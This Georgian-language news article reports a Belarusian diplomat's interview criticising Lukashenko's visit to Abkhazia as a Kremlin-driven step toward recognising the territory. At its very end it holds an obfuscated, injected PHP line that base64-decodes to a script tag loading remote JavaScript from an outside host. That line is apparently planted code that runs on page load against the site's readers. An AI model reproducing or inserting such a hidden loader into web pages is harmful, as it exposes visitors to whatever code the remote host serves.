celsiusi
ავერსი შნაიდერი
მე ვფიქრობ, ის უპასუხისმგებლო ნაბიჯი, რაც ლუკაშენკომ გადადგა,  განეხორციელებინა აფხაზეთში ვიზიტი, ეს ნათლად მიუთითებს იმაზე, რომ ეს აღიარებისკენ მიმართული ნაბიჯია, –  ამის შესახებ, ბელარუსმა დიპლომატმა ვალერი კოვალენსკმა "რადიო მაესტროსთან" ინტერვიუში განაცხადა. 
 
მისივე თქმით, ვიზიტი იყო მოულოდნელი! თუმცა ყველას ესმის, რომ ლუკაშენკო დიდი ხნის განმავლობაში იმყოფებოდა კრემლის ზეწოლის ქვეშ, რომ მას ამ ტერიტორიების აღიარება მოეხდინა, რომლებიც რუსეთის მიერ პრაქტიკულად ანექსირებული და ოკუპირებულია.
 
"ლუკაშენკო აღნიშნულ საკითხს იყენებდა რუსეთზე და საქართველოზე გავლენის ბერკეტად. მიუხედავად ამისა, დადგა ის მომენტი, როდესაც ლუკაშენკომ გადაწყვიტა ვიზიტი განეხორციელებინა აფხაზეთში, მართალია არაოფიციალური, თუმცა სიმბოლური და მნიშვნელოვანია. ეს ვიზიტი ხდება იმ რეფერენდუმების ფონზე, რომელიც უკრაინაში ჩატარდა. შესაბამისად, კონტექსტი ძალიან მნიშვნელოვანია იმისათვის, რომ მიმდინარე პროცესები სწორად შეაფასო. ჩვენ ამ ვიზიტს ვაკრიტიკებთ და ვაცხადებთ, რომ არაკანონიერია! ლუკაშენკო  ბელარუსელების სახელით არ მოქმედებს მოქმედებს, ეს ეწინააღმდეგა ბალარუსის ნაციონალურ ინტერესებს! ამასთან აღვნიშნავთ, რომ აღნიშნული თავად ბელარუსიისთვისაც საფრთხეს წარმოადგენს. ჩვენ ვხედავთ როგორ იქცევა რუსეთი მეზობელი ქვეყნების მიმართ, რა ბერკეტებს იყენებს მათ წინააღმდეგ იმისათვის, რომ უფრო ძლიერი გავლენა მოიპოვოს. იქნება ეს საქართველო, ბელარუსია ან უკრაინა. მეზობლების მიმართ რუსეთი სხვადასხვა ხერხებს მიმართავს, ზოგან შეიძლება ეს იყოს  სამხედრო ჩარევა, როგორც ეს იყო 2008 წელს საქართველოში და როგორც დღეს უკრაინაში ხდება. ბელარუსია რუსეთის მხრიდან მნიშვნელოვან ზეწოლას განიცდის საომარი და პოლიტიკური მოქმედებების მიმართულებით. ლუკაშენკომ, პრაქტიკულად გაბანკროტებულმა პოლიტიკოსმა, დასუსტებულმა, უარი თქვა ბელარუსს საზოგადოებასთან ეწარმოებინა მოლაპარაკებები", – აღნიშნა დიპლომატმა.  
 
მან ასევე აღნიშნა, რომ დღეს ლუკაშენკო სრულად რუსეთის ზეწოლის ქვეშ მოექცა და არ დარჩა უნარი შეეწინააღმდეგოს რუსეთისგან მომდინარე ზეწოლებს. 
 
"ლუკაშენკო რუსეთის ინსტრუმენტად გარდაიქმნა, რომ მან მეზობლების წინააღმდეგ რუსეთის იმპერიული პოლიტიკა აწარმოოს.
        
ვფიქრობ, რომ აღნიშნულ შემთხვევაში ლუკაშენკოს რეალური მიზნები  დაემთხვევა რუსეთის ინტერესებს, რაც საქართველოს დასუსტებას ნიშნავს. აჩვენონ, რომ ის ტერიტორიები, რომლებმაც რუსეთის დახმარებით თავად გამოაცხადეს დამოუკიდებლობა და თითქოსდა ადრე თუ გვიან რუსეთისგან გავლენ, თუმცა რუსეთის მიერ მათი დამოუკიდებლობის აღიარება პირველი ნაბიჯი იყო იმისა, რომ აფხაზეთზე და სამხრეთ ოსეთზე სრული კონტროლის განსახორციელებლად. 
 
მე ვფიქრობ, ის უპასუხისმგებლო ნაბიჯი, რაც ლუკაშენკომ გადადგა,  განეხორციელებინა აფხაზეთში ვიზიტი, ეს ნათლად მიუთითებს იმაზე, რომ ეს აღიარებისკენ მიმართული ნაბიჯია. შეიძლება ამას ცოტა მეტი ან ნაკლები დრო დასჭირდეს, მაგრამ ეს იქნება მტრული ნაბიჯი საქართველოს მიმართ, რაც ტერიტორიულ მთლიანობას არღვევს, რაც საერთაშორისოდ არის აღიარებულია." – განაცხადა კოვალენსკმა. 
 
გადაცემის სრული ვერსიის ნახვვა შესაძლებელია აქ.  
 
450
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");